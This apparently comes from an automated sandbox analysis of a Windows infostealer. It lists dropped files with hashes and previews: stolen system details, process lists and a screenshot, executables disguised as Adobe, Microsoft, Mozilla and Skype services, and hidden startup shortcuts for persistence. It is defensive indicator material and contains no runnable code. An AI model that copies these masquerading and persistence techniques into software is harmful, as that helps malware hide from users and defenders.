ZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Roaming\134349\Information.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	657
Entropy (8bit):	4.156799182956013
Encrypted:	false
SSDEEP:	6:pYcCFWvLT4BjJfpvXJwkn23f3pdTegLzR+cYu0yFhdqSY7NuX0QN5TOjsQwA67X:pYzZfpfafTTeo4cYVmdy7NuhNNOsA6r
MD5:	5442C5F2A157BC0DDBCA16EB96596247
SHA1:	45C54D49C04C5992243989FA950A3A37401C2C0F
SHA-256:	5C88A2C05A0970ACC733FB4E756AFAA5E365C8B53D44CBDD8955ADDE1F148D01
SHA-512:	E5938D3B97207CEE8C0CCACF5919A4E890F7F59ADFCAEDE158C62F58B226FC92DE715CA1C51E46F0148C662D54FED278E5C11C4E5651D55273D88266023630AF
Malicious:	false
Reputation:	unknown
Preview:	==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 134349/user. ClipBoard : . Launch : C:\Users\user\AppData\Local\Temp\jqnnpe.exe. ==================================================. Screen resolution : 1280x1024. Current time : 07/07/2024 05:12:10. HWID : 3408D440A4. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : 1BUBDD. ==================================================. IP Geolocation : 8.46.123.33 [United States]. Log Date : 07/06/2024 7:28. BSSID : 00:50:56:a7:21:15. ==================================================

C:\Users\user\AppData\Roaming\134349\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	14845
Entropy (8bit):	5.560360583279939
Encrypted:	false
SSDEEP:	48:ONyCvnyCcyCiyC8yCcyCcyCcyCcyCt9yC/MzyCS0MKyCv1yCcyCzyCbbcJtyCtFo:OtORMbMw8w9qepueO7BDM7MvyUMOMo
MD5:	C41423268E68178AA63D3BA4FACE241A
SHA1:	96C50B1CE4B02DDAF9EE1154D879B29536C28DD1
SHA-256:	36BF8AD326C0D13C4806F60101BB85F630E917E1AD038F554C361E2DE55C5514
SHA-512:	B52878971D0F1BDD7600AB5EDCEF23344E01FDEF9DD99283403492A8E1441E035CF7D77C17C3ABD8F23AD44E94585A4438FC9294BD849E26B1D48D84B52C9378
Malicious:	false
Reputation:	unknown
Preview:	NAME: svchost.EXE: ..NAME: explorer.EXE: C:\Windows\Explorer.EXE..NAME: conhost.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost.EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost.EXE: ..NAME: smartscreen.EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost.EXE: ..NAME: svchost.EXE: ..NAME: csrss.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: svchost.EXE: ..NAME: sihost.EXE: C:\Windows\system32\sihost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\Wnbvwny

C:\Users\user\AppData\Roaming\134349\Screen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	599446
Entropy (8bit):	7.9423959623734
Encrypted:	false
SSDEEP:	12288:NQXRS5TgTxOrUcvYrSnYqv4Jsduat3HFCN4aWVsVk1B7oT2ChXXxypbieybi9TAr:NQXR/OLKSYqrb3kSXmOBU6MXXxypKie
MD5:	4735694A94648D95484B38E9BB6ACB9E
SHA1:	3E42757DDD80B824BD711FA914EC5051E06BC2C6
SHA-256:	9BC864C03FC1F9D92FC6201D16A9F2C53BBAC5EAA6CFAC3C43103EC9C8693F7B
SHA-512:	722CD771F86F35C8E9CF6F3A8404FFA6E25CEA1654A3DB8187232BE275D952B775129F0DAD3ED4B480BD4A304125DAF96CA18E522ECE7EB208B0DEA737BDC1BE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.........n.d.u....^.s.}..6f....d.1f6 ..B.1.......@Hh.1.....OVd........xVfFDF.....]........p.8r\z.....1zE.a..Y..h?.^.s7..1./....x...L_.B...E..CYzq>F/~>.K/.`V..+.)Y.G..{.......<w5.-..,=;.W..3s...k..........lY.."..8%....gc......>...r..d:.6+...\......r.._%?...,O.._..........C..0.r.z.......eY.5>_..l3.s..$..=.g.....\..9k....f...........R.{.5.70.6= ...1/,.......5Xy@......}...&....${...}.+..9.,.....9..{q.L...I.....0n....).5...@."&`....\|.n.ih~W..<.c+.s...+s_.{`../...o...#X.y"d...8.q\.6..@.z/kV..6a......[F...s....+h....../.u\Y...Q....u....v.'`..u....."g.6......b\.K. .=....Io.s...z]...k...1...~..5...yTc...p-...r..6V.+..^..=.#...._.%9.#...}lE..E....S.w...O.,..N.k`...>...u.Go.5.q.\|.....Y.X.,.qT.[....e.F?..z...!9a...+[%.=.[.]~.U.9..a.=@c....~.o.&?...5=...\|OP\......e...^.k..o.Sz.>.)z...'....M..#2._r...9..=e.bR.".?.iF....f..t..I...[...Q.......:...1.!.;.........Z.......

C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.998931674533475
Encrypted:	false
SSDEEP:	12:8ij6+R4164pPWCvdY//HQj0LkVX6KrU1gtE522VAjAo2rHw3bPBmV:8b+RiHpeM+/Qi32U1Oi2wUAhMPBm
MD5:	D5D396F5B3FB433389388AF166477ECE
SHA1:	81A6F76EF0B12CD663D5086B1C281372F9EE7894
SHA-256:	298C771FBA496493B3613891256D1A95E24E2EF6B06CE6C21694172D0ED64CE5
SHA-512:	3D58623E9371BD7CAB85E39C57AD3C9B4E00F2AE6AE149CD1BEE4868D4B7593F7767177FEEC1FC2E259CAA5EAF960DA8166D69872E4C03DDE910CED79D798FB7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ......j.......j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....P.1.....CWT^..Adobe.<......CW.^CWT^..........................G...A.d.o.b.e.....p.2..p...X`[ .SERVIC~1.EXE..T.......X`[.X`[....V........................S.e.r.v.i.c.e._.A.d.o.b.e...e.x.e.......e...............-.......d...........w..\|.....C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe....W.i.n.S.e.r.v.e.r.&.....\.....\.....\.....\.....\.A.d.o.b.e.\.S.e.r.v.i.c.e._.A.d.o.b.e...e.x.e.`.......X.......134349...........hT..CrF.f4... .\|~T..b...,.......hT..CrF.f4... .\|~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Microsoft.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
Category:	dropped
Size (bytes):	932
Entropy (8bit):	5.0323765262793385
Encrypted:	false
SSDEEP:	12:8iJL4s4pPWCvdY//HQj0LwzTQljf1g5z02KhjEjAJrHSu/HrKKDbkLEBmV:8eLUpeM+/Qihf120jUAJmuvrtHBm
MD5:	C31DBAD319C227E3BBCE95311D97361F
SHA1:	EA9AD7F609A1BA2872E43B394089A0BD5502368A
SHA-256:	7EC5EA37199A531BFE84F59DC3C78AE6447E904A45AF195A1BD911E4CAC74419
SHA-512:	3F4973296B26103667AA589255778398EE82B3489968F898A9F15F8F44B8E6CE471CEA34471DABCE465A84ADE82C74ECF6E26639DA14077A23389E9489586CC8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... .....5j......5j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X][..........................9D..M.i.c.r.o.s.o.f.t.....x.2..p...X`[ .SERVIC~1.EXE..\.......X`[.X`[............................S.e.r.v.i.c.e._.M.i.c.r.o.s.o.f.t...e.x.e.......m...............-.......l...........w..\|.....C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe....W.i.n.S.e.r.v.e.r.!.....\.....\.....\.....\.S.e.r.v.i.c.e._.M.i.c.r.o.s.o.f.t...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Mozilla.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:26:59 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.998789832988957
Encrypted:	false
SSDEEP:	12:8ifpWC4e4pPWCvdY//HQj0Le/R1E1gJb2HiAjAlrH0HGTH2bgPEBmV:8i6peM+/QiepO1ibQAl8gPEBm
MD5:	C764F861003BAEF153D99AAAFCF33747
SHA1:	DDCFC857B08588E962972E86FA89BBF562062148
SHA-256:	2D4E73D947C2F123118D67C7D8DDEB80EC33EC2118AFBAA78C0EA1A532AFAE48
SHA-512:	1E9BACB5BD8E84B9CE22F898821202348917C92FE0460506F9022A20D53B89DE8BDECAD5B5B8C1398A20286B0A9E0300CFAE0BD8C8ECF961888F0F28B1A3AD43
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....UFj.....UFj....D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....V.1.....CWN^..Mozilla.@......CWN^CWN^....2.....................or#.M.o.z.i.l.l.a.....t.2..p...X`[ .SERVIC~1.EXE..X.......X`[.X`[............................S.e.r.v.i.c.e._.M.o.z.i.l.l.a...e.x.e.......i...............-.......h...........w..\|.....C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe....W.i.n.S.e.r.v.e.r......\.....\.....\.....\.....\.M.o.z.i.l.l.a.\.S.e.r.v.i.c.e._.M.o.z.i.l.l.a...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Skype.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:26:59 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.973121735788259
Encrypted:	false
SSDEEP:	12:8igKX4164pPWCvdY//HQj0Lk6C3JU1gtG/42NEAjAo2rHQRnKNEbvBmV:8OiHpeM+/QirCZU1OGwTUAhYnFvBm
MD5:	4E4066B81C9DE600ED22598E162EA5FD
SHA1:	97AB8AC7C97FDCDD0387F36BD4D91ED870EC6F9B
SHA-256:	F499A4C51FDFFFC2AB787D25955DE781E7C9148DB7AD243D6B68B4721A86204D
SHA-512:	A1D6B735A247F65135E4C980E10DD754A0986E9716E1C02515D20E17A638D9D87E5579AA159E8FF35FC14FCAA48B005A1CA416A0D31A29E71B9C7E9E82D84579
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....Hj.....Hj....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....P.1.....DW.D..Skype.<......DW.DDW.D....(......................J6.S.k.y.p.e.....p.2..p...X`[ .SERVIC~1.EXE..T.......X`[.X`[....;........................S.e.r.v.i.c.e._.S.k.y.p.e...e.x.e.......e...............-.......d...........w..\|.....C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe....W.i.n.S.e.r.v.e.r.&.....\.....\.....\.....\.....\.S.k.y.p.e.\.S.e.r.v.i.c.e._.S.k.y.p.e...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_com.adobe.dunamis.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	4.971332837195575
Encrypted:	false
SSDEEP:	24:86tpeM+/QivsuDrsU1mvc3DrgUA5NyBDrcDrSvBm:86tpeLQivsTvrjXO
MD5:	40CD8028E43C4A8E5E88E91109809D8A
SHA1:	63D6E2B543C2F4BB5AD24B744120806E4BBBF989
SHA-256:	08A26AECA90EEEC27312156117FBCDEA7331501853F20A97533ACFE3A3DEBE6D
SHA-512:	79FC95A95067E4FB9426F7472658080B07550CE528A5114DB34AC46338401B51C89EFAECBBA955DB20B8F42BE1742E5694ED9887ED328139843BD34BD4055C25
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... .....,j......,j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....p.1.....CWT^..COMADO~1.DUN..T......CWT^CWT^..........................G...c.o.m...a.d.o.b.e...d.u.n.a.m.i.s.......2..p...X`[ .SERVIC~1.EXE..l.......X`[.X`[....U........................S.e.r.v.i.c.e._.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s...e.x.e.......}...............-.......\|...........w..\|.....C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe....W.i.n.S.e.r.v.e.r.>.....\.....\.....\.....\.....\.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s.\.S.e.r.v.i.c.e._.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_{B955B2CC07A01546086603}.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:28:10 2024, mtime=Sat Jul 6 10:28:10 2024, atime=Sat Jul 6 10:28:10 2024, length=238080, window=hide
Category:	dropped
Size (bytes):	1108
Entropy (8bit):	4.991670111315793
Encrypted:	false
SSDEEP:	24:8a+Z/CM+shCr9ui1Jm3C7uWAP0tsuEuVxEyBm:8a+ZawhG88vKNCH/X
MD5:	0D86D5CACEE791043121089BB92E7E34
SHA1:	3D86AC106AFD56F1955A1E24B43B6051204D028B
SHA-256:	C9E81E057F9F2BA3630CF5F3BB2163B5A5DC2AC0EEA9FCE6E6203AC2A96A7EEE
SHA-512:	C17C972BDDAC51612E8BC6347294AF928F96D5CFFC2ED054AE0390C6D0FEFA1CC5B3F791396134CEEC31C547CBB43F080DEAB87233ABF451A6E422478405ABE2
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...1.......1.......`'..............................$.:..DG..Yr?.D..U..k0.&...&......vk.v.......d...............t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......Xp[..Roaming.@......CW.^.Xt[...........................%K.R.o.a.m.i.n.g.....z.1......X`[..{B955B~1..b.......X`[.Xz[....n.......................[.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}.......2......X.[ .SERVIC~1.EXE..z.......X.[.X.[............................0.S.e.r.v.i.c.e._.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}...e.x.e.......................-...................w..\|.....C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe....W.i.n.S.e.r.v.e.r.L.....\.....\.....\.....\.....\.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}.\.S.e.r.v.i.c.e._.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}...e.x.e.`.......X.......134349...........hT..CrF.f4... .c.V.;...,...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\psvhost.exe.lnk

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Hidden, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:28:52 2024, atime=Sat Jul 6 10:28:10 2024, length=238080, window=hide
Category:	dropped
Size (bytes):	1099
Entropy (8bit):	5.030438381113966
Encrypted:	false
SSDEEP:	24:8K3aM/L+RT/bSNa3QA9fYeq1iD7cHqyFm:8K3ahRLONaXtDSiDDyF
MD5:	678ADDB4FD7E9509EE87CDE8A8ABC8E5
SHA1:	D18490C54E6B6F86E1874B0678CFA052458070B2
SHA-256:	F87208C70E3D6FBBB9A38D02EF2E16B1BC285B9920B1DD2922C83450E3C3CCF9
SHA-512:	CB38A5B462CBE0AE0D361080BA5479297FE6428989D3CDFA08A78AD5E6946C7024DF599F2B6FEE2EA18C83EA4D14C4C4AE143F94C771D9D32E7973A191334158
Malicious:	false
Reputation:	unknown
Preview:	L..................F...."...%.Kj..........`'................................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....)p..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.P.1......X.[..Local.<......CW.^.X.[....b.....................,I..L.o.c.a.l.....\.1......X`[..MICROS~1..D......CW.^.X`[.............................M.i.c.r.o.s.o.f.t.....b.2......X.[".psvhost.exe.H.......X`[.X.[....].......................0.p.s.v.h.o.s.t...e.x.e.......a...............-.......`...........w..\|.....C:\Users\user\AppData\Local\Microsoft\psvhost.exe....O.n.e.D.r.i.v.e.-.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.p.s.v.h.o.s.t...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

Download File

Process:	C:\Windows\System32\relog.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	modified
Size (bytes):	13741
Entropy (8bit):	5.390835576331915
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJS35Bu/6D7HZdaWjFK/iQwo4YpPha5aN:yegqumcwQMB0AkAoN
MD5:	F57A13DA364EBC03BC4D59C426F66F85
SHA1:	3FFB5A050C0A11A4C7F6EECDF032DE0B606DB466
SHA-256:	8C76DB6F5E11ACE023B049F6189E05C0459E3C001A630ACCC2A2B96C9666C88F
SHA-512:	2D2B8721EBF1A26270ECE38A0B35531944E68FFA32118FF29BF3527861435FD1D36B5BE6ECC1712567B6A6759B443D89AB1370941B09B916E2160FED276FB9AE
Malicious:	true
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
